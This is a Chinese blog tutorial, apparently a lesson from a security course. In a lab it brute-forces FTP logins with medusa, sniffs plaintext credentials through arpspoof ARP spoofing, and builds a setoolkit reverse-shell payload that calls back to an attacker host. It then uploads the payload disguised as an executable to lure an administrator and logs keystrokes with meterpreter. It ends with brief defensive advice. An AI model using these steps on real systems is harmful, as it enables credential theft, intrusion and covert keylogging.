• 6-2漏洞利用-ftp不可避免的问题


    在这里插入图片描述

    FTP用户名密码暴力破解

    Windows下 CMD命令添加用户、以及提升Administrator管理员权限,之后这个用户将做为登录FTP的用户名和密码

    net user 用户名 用户密码 /add
    //表示添加新的用户名密码
    net localgroup administrators 用户名 /add
    //提升管理权限
    
    • 1
    • 2
    • 3
    • 4
    net user admin1 admin1 /add
    net localgroup administrators admin1 /add
    
    • 1
    • 2

    在这里插入图片描述

    windows下 FTP服务器添加用户,否则我们就不能使用我们添加的admin1用户登录

    打开iis管理器

    在这里插入图片描述

    使用medusa暴力破解工具来破解admin1用户的密码

    在这里插入图片描述

    在最后输出了对应的用户名密码

    先用nc连接一下ftp服务

    nc 192.168.1.107 21
    USER admin1
    PASS admin1
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    连接成功

    只有在输入正确的账号密码的情况下,才会登录成功

    medusa
    
    • 1

    在这里插入图片描述

    medusa -h 192.168.1.107 -u admin1 -P /root/Desktop/pass.txt -M ftp
    
    • 1

    在这里插入图片描述

    可以看到,我们在最后发现了用户名密码,我们也可以不知道用户名、密码进行破解

    这个时候,我们就可以用nc登录

    FTP用户名密码验证

    FTP协议中用于用户认证的过程中,客户端要与服务端进行通信,并且他们两个在验证过程中,客户端会发送明文的信息到服务端,服务端在整个过程中,接收到的信息都是明文状态,比如说,登录使用的弱口令、密码都是明文的,我们可以进行查看,不经过加密,比如说,客户端发送admin,在传送到服务端的整个过程中,我们都可以查看

    我们可以在wireshark抓包进行查看

    在这里插入图片描述

    我们接下来,将使用nc连接当前的FTP服务器,然后使用wireshark进行抓包,从而验证,我们对应的明文传输

    先打开ftp,选择eth0端口监听,模式选择ftp

    在这里插入图片描述

    nc 192.168.1.101 21
    USER admin1
    PASS admin1
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    我们来看一下wireshark抓的包

    在这里插入图片描述

    可以看到,都是明文

    FTP用户名明文密码嗅探

    因为整个传输过程中,都是使用明文状态,没有进行加密,我们可以在FTP和服务端进行嗅探,取对应的用户名和密码

    利用arpspoof进行ARP嗅探,从而使得我们某一客户端,连接对应ftp服务器时,欺骗客户端,我们是网关,从而获得对应的数据包

    在这里插入图片描述

    这个时候,所有数据包都将发送到kali,我们就可以使用wireshark进行流量嗅探

    在这里插入图片描述

    发现对应的用户名和密码

    ifconfig
    arpspoof -i eth0 192.168.1.1 -t 192.168.1.105
    
    • 1
    • 2

    在这里插入图片描述

    arp -a
    
    • 1

    在这里插入图片描述

    欺骗成功,我们看到192.168.1.1的mac地址是kali的mac地址

    ftp 192.168.1.107
    admin1
    admin1
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    登录成功

    嗅探与暴力破解,最大的不同,在于暴力破解需要强大的字典,而这种嗅探,我们只要嗅探成功,就可以获得对应的用户名和密码,即可进行登录

    FTP登录之后做的事情

    FTP主要是用来文件传输,接下来,我们就需要上传一个反弹shell,当管理员点击shell之后,服务器就会返回对应的cmd,执行窗口、执行权限,就会执行对应的命令

    利用metasploit创建反弹shell上传到FTP服务器。可以利用setookit快速生成反弹shell。

    在这里插入图片描述

    setoolkit
    4
    2
    192.168.1.106
    4445
    
    • 1
    • 2
    • 3
    • 4
    • 5

    在这里插入图片描述

    为了确保不冲突,我们可以查看当前kali开放端口

    netstat -pantu
    
    • 1

    在这里插入图片描述

    我们发现4445端口,不在当前的内容当中,我们就可以用4445端口,做为反弹监听的端口

    在这里插入图片描述

    这个时候,就开始生成对应的payload

    开启监听

    我们打开另外一个终端

    cd /root/.set
    ls
    mv payload.exe /root/Desktop/
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    这个时候,我们可以使用ftp,把对应的payload上传,使用flashfxp软件,进行上传

    在这里插入图片描述

    上传成功后,就会在FTP服务器的根目录下,生成payload.exe

    在这里插入图片描述

    我们需要诱惑管理员点击,对应的exe文件,我们就需要进行修改,比如move.exe

    在这里插入图片描述

    很有可能,管理员会双击,我们就可以在kali当中,查看终端

    在这里插入图片描述

    终端当中,就会有对应的连接

    sessions -l
    //查看
    
    • 1
    • 2

    在这里插入图片描述

    sessions -i 1
    
    • 1

    在这里插入图片描述

    可以看到连接上去,我们就可以进行操作了

    HELP
    
    • 1

    在这里插入图片描述

    我们可以进行键盘操作等等

    sysinfo
    //查看当前session当中win2k3的信息
    
    • 1
    • 2

    在这里插入图片描述

    keyscan_start
    keyscan_dump
    
    • 1
    • 2

    在这里插入图片描述

    总结

    同时要掌握FTP下的文件,是不能乱点,一定要加强对应的管理,否则我们点击了exe文件,就会导致服务器的沦陷,也从侧面发现,我们要对FTP用户加强管理,避免他们的用户名密码泄露,以及我们要在局域网当中,对它进行安全维护,防止arp嗅探到我们的ftp明文用户名和密码

  • 相关阅读:
    通过webkitAnimationEnd实现轮播动画
    远程实时监控管理:5G物联网技术助力配电站管理
    超详细的Java异常处理机制知识整理
    10.10 翻译设置
    [leetcode 数位运算] 2939. 最大异或乘积 M
    Android Compose 入门,深入底层源码分析
    9月22日全球Web3加密行业重大资讯大汇总
    linux--进度条
    flex布局中的align-content属性
    王杰qtday3
  • 原文地址:https://blog.csdn.net/m0_53008479/article/details/125560669